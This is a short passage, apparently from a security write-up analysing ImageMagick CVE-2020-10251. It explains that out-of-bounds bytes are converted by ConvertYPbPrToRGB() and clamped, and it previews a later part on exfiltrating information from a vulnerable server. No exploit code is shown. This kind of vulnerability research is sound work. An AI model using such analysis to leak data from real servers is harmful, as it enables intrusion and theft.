In summary, the OOB bytes are converted with the “ConvertYPbPrToRGB()” algorithm, and has their values clamped between 0 and QuantumRange. In the next part, we will utilise what we have learnt about the vulnerability to exfiltrate useful information from a vulnerable server.

ImageMagick CVE-2020-10251: Vulnerability analysis